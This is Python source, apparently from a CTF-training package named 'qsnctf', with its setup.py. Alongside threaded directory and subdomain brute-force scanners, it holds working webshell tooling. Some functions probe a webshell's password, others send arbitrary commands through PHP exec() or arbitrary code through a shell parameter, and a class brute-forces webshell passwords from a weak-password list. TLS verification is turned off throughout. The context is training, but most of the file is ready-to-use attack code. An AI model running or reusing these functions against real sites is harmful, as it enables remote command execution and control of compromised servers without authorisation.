            for comment in comments:
                # 取出注释的内容
                r_list.append(comment)
            src = r_list
        else:
            src = 'No comment'
    else:
        src = "Request unreachable"
    return src


def get_url_time(url):
    """
    :param url: url
    :return: requests seconds
    """
    start_time = time.time()
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    response = requests.get(url, headers=browser, verify=False)
    end_time = time.time()
    speed = end_time - start_time
    return speed


def get_url_ico(url):
    """
    :param url: url
    :return: url ico address
    """
    start_time = time.time()
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    response = requests.get(url, headers=browser, verify=False)
    soup = BeautifulSoup(response.text, 'html.parser')
    link_tags = soup.find_all('link', rel='shortcut icon')
    # 遍历 link 标签
    if link_tags:
        for link_tag in link_tags:
            # 取出 ICO 图标的 URL
            ico_url = link_tag.get('href')
            if ico_url:
                return ico_url
    else:
        return False


def get_webshell_post(url, key, timeout=5):
    """
    :param url: url
    :param key: key
    :return: requests seconds
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    try:
        requests.packages.urllib3.disable_warnings()
        shell = "print('test_a_shell');"
        post_data = f"{key}={shell}"
        response = requests.post(url, headers=browser, data=post_data, verify=False, timeout=timeout)
        if "test_a_shell" in response.text:
            return True
    except:
        return False
    return False


def get_webshell_get(url, key, timeout=5):
    """
    :param url: url
    :param key: key
    :return: requests seconds
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    try:
        requests.packages.urllib3.disable_warnings()
        shell = "print('test_a_shell');"
        params = f"{key}={shell}"
        response = requests.get(url, headers=browser, params=params, verify=False, timeout=timeout)
        if "test_a_shell" in response.text:
            return True
    except:
        return False
    return False


def get_exec_webshell_get(url, key, shell):
    """
    :param url: url
    :param key: key
    :param shell: shell
    :return: requests seconds
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    sh = f"$output = array();exec('{shell}', $output);print(implode('\n', $output));"
    params = f"{key}={sh}"
    response = requests.get(url, headers=browser, params=params, verify=False)
    return response.text


def get_exec_webshell_post(url, key, shell):
    """
    :param url: url
    :param key: key
    :param shell: shell
    :return: requests seconds
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    sh = f"$output = array();exec('{shell}', $output);print(implode('\n', $output));"
    data = f"{key}={sh}"
    response = requests.post(url, headers=browser, data=data, verify=False)
    return response.text


def get_eval_webshell_get(url, key, shell):
    """
    :param url: url
    :param key: key
    :param shell: shell
    :return: requests seconds
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    sh = f"{shell}"
    params = f"{key}={sh}"
    response = requests.get(url, headers=browser, params=params, verify=False)
    return response.text


def get_eval_webshell_post(url, key, shell):
    """
    :param url: url
    :param key: key
    :param shell: shell
    :return: requests seconds
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    sh = f"{shell}"
    data = f"{key}={sh}"
    response = requests.post(url, headers=browser, data=data, verify=False)
    return response.text


class DirScan:
    def __init__(self, url, threadline=10, sleep_time=0, dirlist=None, return_code=None, echo=False, wait=True, cookies='', timeout=1):
        """
        :param url: Sans URL
        :param threadline: Thread line
        :param sleep_time: sleep time
        :param dirlist: dirs list
        :param return_code: return code
        :param echo: print scan result
        :param wait: Whether to wait for the process to end
        :param cookies: cookie
        """
        self.cookies = cookies
        self.q = None
        self.print_list = echo
        self.wait = wait
        self.url = url
        self.timeout = timeout
        self.threadline = threadline
        self.sleep_time = sleep_time
        self.results = []
        self.results_code = []
        self.check_url = ""
        self.dirlist = dirlist
        if return_code is not None:
            self.return_code = return_code
        else:
            self.return_code = [200, 301, 302, 401, 403, 500]  # 默认不返回404，其余需返回，主要为渗透使用。
        self.run()

    def scan_dir_list(self):
        if self.dirlist:
            pass  # 如果使用自定义的dirlist,这里不用读取
        else:
            package_path = os.path.abspath(os.path.dirname(__file__))
            file_path = os.path.join(package_path, 'plugin', 'txt', 'dirs.txt')
            self.dirlist = read_file_to_list(file_path)
        if is_http_or_https_url(self.url):
            self.url = normalize_url(self.url)
        else:
            raise ValueError("Invalid url")

    def scan_dir(self):
        while not self.q.empty():
            # 从队列中取出一个路径
            path = self.q.get()
            requests.packages.urllib3.disable_warnings()
            browser = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
                "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
                "Referer": f"{self.url}{path}", "Cookie": f"{self.cookies}",
                "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
                "Te": "trailers", "Connection": "close"}
            try:
                response = requests.get(self.url + path, headers=browser, verify=False, timeout=self.timeout)
                time.sleep(self.sleep_time)
                # 将符合条件的扫描结果添加到results列表
                if response.status_code in self.return_code:
                    self.results.append(f"{self.url}{path}")
                    self.results_code.append(f"{self.url}{path} {response.status_code}")
                    if self.print_list:
                        print(f"{self.url}{path} {response.status_code}")  # print response
            except:
                pass
            # 完成之后将任务标记为完成
            self.q.task_done()

    def run(self):
        self.scan_dir_list()
        self.q = queue.Queue()  # Create Queue
        for path in self.dirlist:
            self.q.put(path)
        for i in range(self.threadline):
            thread = threading.Thread(target=self.scan_dir)
            thread.start()
        if self.wait:
            self.q.join()  # Wait for thread to finish
        # 如果不等待，也可以直接获取对象中的results、results_code属性


class UrlScan:
    # 网页存活扫描
    def __init__(self, url_list, threadline=10, sleep_time=0, return_code=None, echo=False, wait=True, timeout=1, cookies=''):
        """
        :param url_list: Sans URL
        :param threadline: Thread line
        :param sleep_time: sleep time
        :param return_code: return code
        :param echo: print scan result
        :param wait: Whether to wait for the process to end
        :param cookies: cookie
        """
        self.cookies = cookies
        self.q = None
        self.print_list = echo
        self.wait = wait
        self.url_list = url_list
        self.threadline = threadline
        self.timeout = timeout
        self.sleep_time = sleep_time
        self.results = []
        self.results_code = []
        self.results_title = []
        if return_code is not None:
            self.return_code = return_code
        else:
            self.return_code = [200, 301, 302, 401, 403, 404, 500]  # 这里默认404是需要返回的，为了验证URL的状态
        self.run()

    def scan_url(self):
        while not self.q.empty():
            # 从队列中取出一个路径
            url = self.q.get()
            requests.packages.urllib3.disable_warnings()
            browser = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
                "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
                "Referer": f"{url}", "Cookie": f"{self.cookies}",
                "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
                "Te": "trailers", "Connection": "close"}
            try:
                response = requests.get(url, headers=browser, verify=False, timeout=self.timeout)
                time.sleep(self.sleep_time)
                # 将符合条件的扫描结果添加到results列表
                if response.status_code in self.return_code:
                    self.results.append(f"{url}")
                    self.results_code.append(f"{url} {response.status_code}")
                    if response.status_code == 200:
                        soup = BeautifulSoup(response.text, "html.parser")
                        title = soup.find("title")
                        title = re.search(r"<title>(.+?)</title>", str(title))
                        if title:
                            title = title.group(1)
                        else:
                            title = "No Title"
                        self.results_title.append(f"{url} {title}")
                    if self.print_list and response.status_code == 200:
                        print(f"{url} {response.status_code} {title}")  # print response
                    elif self.print_list and response.status_code != 200:
                        print(f"{url} {response.status_code}")
            except:
                pass
            # 完成之后将任务标记为完成
            self.q.task_done()

    def run(self):
        self.q = queue.Queue()  # Create Queue
        for path in self.url_list:
            self.q.put(path)
        for i in range(self.threadline):
            thread = threading.Thread(target=self.scan_url)
            thread.start()
        if self.wait:
            self.q.join()  # Wait for thread to finish
        # 如果不等待，也可以直接获取对象中的results、results_code属性


class DomainScan:
    def __init__(self, domain, threadline=10, sleep_time=0, domainlist=None, return_code=None, echo=False, wait=True, timeout = 1):
        """
        :param domain: Sans domain
        :param threadline: Thread line
        :param sleep_time: sleep time
        :param dirlist: dirs list
        :param return_code: return code
        :param echo: print scan result
        :param wait: Whether to wait for the process to end
        """
        self.results_title = []
        self.q = None
        self.timeout = timeout
        self.print_list = echo
        self.wait = wait
        self.domain = domain
        self.threadline = threadline
        self.sleep_time = sleep_time
        self.results = []
        self.results_code = []
        self.check_url = ""
        self.domainlist = domainlist
        if return_code is not None:
            self.return_code = return_code
        else:
            self.return_code = [200, 301, 302, 401, 403, 500]  # 默认不返回404，其余需返回，主要为渗透使用。
        self.run()

    def scan_domain_list(self):
        if self.domainlist:
            pass  # 如果使用自定义的dirlist,这里不用读取
        else:
            package_path = os.path.abspath(os.path.dirname(__file__))
            file_path = os.path.join(package_path, 'plugin', 'txt', 'domain.txt')
            self.domainlist = read_file_to_list(file_path)

    def scan_domain(self):
        while not self.q.empty():
            # 从队列中取出一个路径
            domain = self.q.get()
            requests.packages.urllib3.disable_warnings()
            browser = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
                "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
                "Referer": f"http://{domain}.{self.domain}/",
                "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
                "Te": "trailers", "Connection": "close"}
            try:
                response = requests.get(f"http://{domain}.{self.domain}/", headers=browser, verify=False, timeout=self.timeout)
                time.sleep(self.sleep_time)
                # 将符合条件的扫描结果添加到results列表
                if response.status_code in self.return_code:
                    self.results.append(f"http://{domain}.{self.domain}/")
                    self.results_code.append(f"http://{domain}.{self.domain}/")
                    if response.status_code == 200:
                        soup = BeautifulSoup(response.text, "html.parser")
                        title = soup.find("title")
                        title = re.search(r"<title>(.+?)</title>", str(title))
                        if title:
                            title = title.group(1)
                        else:
                            title = "No Title"
                        self.results_title.append(f"http://{domain}.{self.domain}/ {title}")
                    if self.print_list and response.status_code == 200:
                        print(f"http://{domain}.{self.domain}/ {response.status_code} {title}")  # print response
                    elif self.print_list and response.status_code != 200:
                        print(f"http://{domain}.{self.domain}/ {response.status_code}")
                    # 完成之后将任务标记为完成
            except:
                pass
            self.q.task_done()

    def run(self):
        self.scan_domain_list()
        self.q = queue.Queue()  # Create Queue
        for path in self.domainlist:
            self.q.put(path)
        for i in range(self.threadline):
            thread = threading.Thread(target=self.scan_domain)
            thread.start()
        if self.wait:
            self.q.join()  # Wait for thread to finish
        # 如果不等待，也可以直接获取对象中的results、results_code属性


class WebShellCracking:
    def __init__(self, url, threadline=10, sleep_time=0, passlist=None, mode="POST"):
        """
        :param url: Shell URL
        :param threadline: thread line
        :param sleep_time: sleep_time in seconds
        :param passlist:  list of passwords
        :param mode: GET or POST
        """
        self.results_title = []
        self.mode = mode
        self.q = None
        self.url = url
        self.threadline = threadline
        self.sleep_time = sleep_time
        self.results = ''
        self.passlist = passlist
        self.return_code = [200, 301, 302, 401, 403, 500]  # 默认不返回404，其余需返回，主要为渗透使用。
        self.run()

    def scan_pass_list(self):
        if self.passlist:
            pass  # 如果使用自定义的dirlist,这里不用读取
        else:
            package_path = os.path.abspath(os.path.dirname(__file__))
            file_path = os.path.join(package_path, 'plugin', 'txt', 'shell_weak_password.txt')
            self.passlist = read_file_to_list(file_path)

    def Cracking_webshell_POST(self):
        while not self.q.empty():
            # 从队列中取出密码
            key = self.q.get()
            if get_webshell_post(self.url, key):
                self.results = key
            time.sleep(self.sleep_time)
            self.q.task_done()

    def Cracking_webshell_GET(self):
        while not self.q.empty():
            # 从队列中取出密码
            key = self.q.get()
            if get_webshell_get(self.url, key):
                self.results = key
            time.sleep(self.sleep_time)
            self.q.task_done()

    def run(self):
        self.scan_pass_list()
        self.q = queue.Queue()  # Create Queue
        for password in self.passlist:
            self.q.put(password)
        for i in range(self.threadline):
            if self.mode == "GET":
                thread = threading.Thread(target=self.Cracking_webshell_GET)
                thread.start()
            else:
                thread = threading.Thread(target=self.Cracking_webshell_POST)
                thread.start()
        self.q.join()  # Wait for thread to finish
        # 如果不等待，也可以直接获取对象中的results、results_code属性




from setuptools import setup, find_packages
import io

with io.open('README.md', encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='qsnctf',
    version='0.0.9.1',
    install_requires=['PyExecJS2', 'base58', 'requests', 'bs4', 'urllib3', 'rarfile', 'sympy'],
    packages=find_packages(),
    include_package_data=True,
    package_data={'qsnctf': ['plugin/*']},
    url='https://github.com/Moxin1044/qsnctf-python',
    license='MIT License',
    long_description=long_description,
    long_description_content_type='text/markdown',
    author='Moxin',
    author_email='1044631097@qq.com',
    description='青少年CTF训练平台提供的Python软件包'
)
